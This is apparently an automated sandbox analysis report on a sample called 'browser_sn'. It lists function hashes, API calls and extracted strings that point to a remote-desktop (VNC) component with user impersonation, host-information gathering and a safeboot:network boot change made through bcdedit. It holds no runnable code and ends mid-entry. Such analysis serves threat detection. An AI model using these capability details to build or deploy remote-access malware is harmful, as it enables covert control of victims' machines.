                                                      • Opcode ID: 47939cc9f4710b2f51dff76dfff1cedda24071f281f1c25a3df912ff0cb64523
                                                      • Instruction ID: 7ebc4c1d0ef4e4fb3cbe61552d8e1420866920507687f4a0bde0b34395bd6cae
                                                      • Opcode Fuzzy Hash: 47939cc9f4710b2f51dff76dfff1cedda24071f281f1c25a3df912ff0cb64523
                                                      • Instruction Fuzzy Hash: E3C13D31B29A029AEA34AF75A4541F9E3B5BF4AB84B845435CE0E477A5DF3CF404C360
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Window$CriticalProcSection$ClipboardEnterLeaveLongMessageNotifyOwnerSend
                                                      • String ID: vncdesktopsink.cpp : Monitor22 %i$vncdesktopsink.cpp : Monitor222 %i$vncdesktopsink.cpp : Monitor3 %i %i$vncdesktopsink.cpp : Power3 %i %i$vncdesktopsink.cpp : Unsethooks Failed$vncdesktopsink.cpp : Unsethooks OK$vncdesktopsink.cpp : failed to set system hooks$vncdesktopsink.cpp : set SC hooks OK$vncdesktopsink.cpp : set W8 hooks OK$vncdesktopsink.cpp : set hooks OK$vncdesktopsink.cpp : unset SC hooks OK$vncdesktopsink.cpp : unset W8 hooks OK
                                                      • API String ID: 378279424-2704384803
                                                      • Opcode ID: 00ad34b858e2698ec28211d85957e875018bbeb98cc9b0c5072344c1147ce0c1
                                                      • Instruction ID: e1219b2ebc8c02437e770caae0dc2dd33b3f58499d844d5c9fd66c0b74c1455b
                                                      • Opcode Fuzzy Hash: 00ad34b858e2698ec28211d85957e875018bbeb98cc9b0c5072344c1147ce0c1
                                                      • Instruction Fuzzy Hash: 07027026A28A8796FB78AB75D5446F8A7A0FF42B40F945536CA1E13391CF3CF454E320
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DataRegion$CriticalSection$CreateEnterLeaveRect
                                                      • String ID: F
                                                      • API String ID: 2411647221-1304234792
                                                      • Opcode ID: 14e9f32395c781ced201d7be751761d342cdd707439dce8d73d8fa27a21d3495
                                                      • Instruction ID: b5dee7842b41b3ec95b376ef1d6583964b4e5703fc0a58c9ac2c4d946df2b823
                                                      • Opcode Fuzzy Hash: 14e9f32395c781ced201d7be751761d342cdd707439dce8d73d8fa27a21d3495
                                                      • Instruction Fuzzy Hash: EDC1A136728A8286E720EB36E4486A9B7A1FF89B84F945031DE4E83755DF3CF445C710
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Find$CloseDesktopDriveErrorFileMode$CriticalFirstFolderFromInputLeaveListLocationLogicalMallocNextOpenPathSectionSpecialStringsTypelstrlen
                                                      • String ID: Desktop$My Documents$Network Favorites$f$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                      • API String ID: 2965397059-206656798
                                                      • Opcode ID: 2db8000c453640fe1383c1b2e2e44d3cb64826df7eb8e4b981688ca979fb9bf6
                                                      • Instruction ID: 64098686da53c037c5b382f943f8a7a8fe285a5b58f51a7e791b8a79a649b4d6
                                                      • Opcode Fuzzy Hash: 2db8000c453640fe1383c1b2e2e44d3cb64826df7eb8e4b981688ca979fb9bf6
                                                      • Instruction Fuzzy Hash: 5C42BF26A2C68285EB70AB35C8583FD67A1EF86B98F840231DA1D477D5DF38F585C320
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: System$InfoMetricsParameters$Desktopmouse_event$CloseCursorInputOpen
                                                      • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                      • API String ID: 246551654-3977938048
                                                      • Opcode ID: 8a846c19ca448c6dfd4fc0fae66a9b6d9b90a853b31161baa3ad83bdd6464dec
                                                      • Instruction ID: 0a262f3d156aa8e0512bf21dc76e19bd11db637f3938896a3da75f622e1adfc1
                                                      • Opcode Fuzzy Hash: 8a846c19ca448c6dfd4fc0fae66a9b6d9b90a853b31161baa3ad83bdd6464dec
                                                      • Instruction Fuzzy Hash: 9D228936A1C6918AE764AB35C4587FEBBA1FF86B48F844135CA49477A4CF38E484C720
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Desktop$DisplayLibrarySettingsThread$Free$ChangeEnum$AddressCloseCurrentInputLoadOpenProc
                                                      • String ID: $DEVICE0$EnumDisplayDevicesA$USER32$\DEVICE$mv video hook driver2$mv2
                                                      • API String ID: 1729393483-4131161223
                                                      • Opcode ID: 8fb70b05fa99fe765fa15744f32cba980a912edec1c339e6501a40cc58f4b770
                                                      • Instruction ID: 006bc026d4bb4fc4799b4f0009bed937969a84e5d9772758e4384b0f143d6390
                                                      • Opcode Fuzzy Hash: 8fb70b05fa99fe765fa15744f32cba980a912edec1c339e6501a40cc58f4b770
                                                      • Instruction Fuzzy Hash: D8B18C32A2968286FB70AB35A4502FDB7A2FF46794FD45035DA0D67B84DF3CE5098720
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateDescriptorSecurity$EventFile$MappingSaclView$ConvertDaclErrorInitializeLastString
                                                      • String ID: Global\$S:(ML;;NW;;;LW)$event_IN$event_IN_DONE$event_OUT$event_OUT_DONE$fm_IN$fm_OUT
                                                      • API String ID: 1989023930-362996323
                                                      • Opcode ID: 110fc2717108ebff6e53033f8ff6c374a8661c63bf5c686a461652ab7439fbc0
                                                      • Instruction ID: 7511df310327ac141a4df3adf74866b8bc3375c3c419aaa46c8f58ea32f265cb
                                                      • Opcode Fuzzy Hash: 110fc2717108ebff6e53033f8ff6c374a8661c63bf5c686a461652ab7439fbc0
                                                      • Instruction Fuzzy Hash: DCB16B72628B8292EA64EB70A4517EAB3A1FF86750FC05131EB1D13B90DF3CE569C750
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: PrivateProfileString$EnvironmentVariable$AttributesErrorExecuteFileForegroundLastShellVersionWindowWrite
                                                      • String ID: /safeboot:network$/boot.ini$SYSTEMDRIVE$SystemRoot$\system32\$bcdedit.exe$boot loader$default$operating systems$runas$twork
                                                      • API String ID: 3746257916-1709497384
                                                      • Opcode ID: 0a761f6e527e6f89f9f2902e2f57a6bb5b8d7dbe4c16f5219fa40f45faea4ce6
                                                      • Instruction ID: 52dc10ac51dd00daf2258d930db734f2ba564bb3c1beabbf1e270d650bffb704
                                                      • Opcode Fuzzy Hash: 0a761f6e527e6f89f9f2902e2f57a6bb5b8d7dbe4c16f5219fa40f45faea4ce6
                                                      • Instruction Fuzzy Hash: 60712E35A25A8699E764DF74E8402E9B7B0FB08368F802336EA6D427E4DF3CE155C750
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Global$Clipboard$AvailableByteCharDataFormatLockMultiSizeUnlockWide$Open
                                                      • String ID:
                                                      • API String ID: 1939172783-0
                                                      • Opcode ID: b74a740e7d7a84ef91a39c9c6b0aed0404e7093e028a8cc676548e38d4108882
                                                      • Instruction ID: 98432795edb0b6f800c7f44807eb00e7e91fe2601d28d6d26d391699e73630d3
                                                      • Opcode Fuzzy Hash: b74a740e7d7a84ef91a39c9c6b0aed0404e7093e028a8cc676548e38d4108882
                                                      • Instruction Fuzzy Hash: BF817D21A287428AEA64BF32A9141B9B3F4FF86B80B845138DE4E43795DF3CF465C314
                                                      APIs
                                                      Strings
                                                      • vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - WSLocked, xrefs: 00007FF790C5C3A7
                                                      • vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - OpenProcessToken Error, xrefs: 00007FF790C5C43D
                                                      • vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - Call, xrefs: 00007FF790C5C2F4
                                                      • vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - 1, xrefs: 00007FF790C5C37E
                                                      • vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - ImpersonateLoggedOnUser Failed, xrefs: 00007FF790C5C455
                                                      • g, xrefs: 00007FF790C5C31B
                                                      • vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - currentUser = %s, xrefs: 00007FF790C5C3DC
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalSection$Leave$Enter
                                                      • String ID: g$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - 1$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - Call$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - ImpersonateLoggedOnUser Failed$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - OpenProcessToken Error$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - WSLocked$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - currentUser = %s
                                                      • API String ID: 2978645861-1267036565
                                                      • Opcode ID: bdb4852c987baf4b60644aebab38a863e7ba7580bc742476bcdc9009847be20c
                                                      • Instruction ID: 2da9a675e7c8becbae577b355a795c1c97ef1529a8ae60eae4776a11616de761
                                                      • Opcode Fuzzy Hash: bdb4852c987baf4b60644aebab38a863e7ba7580bc742476bcdc9009847be20c
                                                      • Instruction Fuzzy Hash: DD515E25A3C68288F674BB35A8546F9A3A1FF96791FC42032D94E06390DF3CF445C760
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DeleteObjectRectfree$CombineCreateCriticalEventSection$EnterErrorFreeHeapLastLeave_errnomalloc
                                                      • String ID: \$vncclient.cpp : FATAL! client update region is empty!
                                                      • API String ID: 1264956880-3227535004
                                                      • Opcode ID: 23a49fa5f1be814596b27dce1756cea377cd1ca12dee1e05d8a6d5d454cb436e
                                                      • Instruction ID: 0b0f0c9551d0ad8db58e82b3ddb0222b75474623f260b5931367eda44c96e0d1
                                                      • Opcode Fuzzy Hash: 23a49fa5f1be814596b27dce1756cea377cd1ca12dee1e05d8a6d5d454cb436e
                                                      • Instruction Fuzzy Hash: B5A1D8336246968AD754EF36E444AAAB7B8FBC9B90F815035EA4D47750CF3DE805CB10
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                      • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (MIPS Processor)$Current user :
                                                      • API String ID: 171970310-18614430
                                                      • Opcode ID: 13559806fcd846485afb22cc621461796e5ecc486d2cf5f10f95b5e9e7543de7
                                                      • Instruction ID: bd25e0456fe9b87d92b95df5584e4fcc4368f52a3d0c15652ad886aad30e9ae9
                                                      • Opcode Fuzzy Hash: 13559806fcd846485afb22cc621461796e5ecc486d2cf5f10f95b5e9e7543de7
                                                      • Instruction Fuzzy Hash: 0DB18121A2868685E774DB3598002F977A0FF05770F805376EA7E87BD5EE28F555C320
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                      • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (MSIL Processor)$Current user :
                                                      • API String ID: 171970310-1756215141
                                                      • Opcode ID: e292ff1ab8a2ec860fca5fdae839fd5dac6431b32c19bd64026a63d2d728b1e0
                                                      • Instruction ID: 5268f0018bff078a0ea3e794e2b9bd0ddf4337deffec8cd8908115ffd22cfbdc
                                                      • Opcode Fuzzy Hash: e292ff1ab8a2ec860fca5fdae839fd5dac6431b32c19bd64026a63d2d728b1e0
                                                      • Instruction Fuzzy Hash: 68B18021A2868685E774DB3598002F977A0FF057B0F805376EA7E87BD5EE28F555C320
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true
                                                      • Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                      • Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
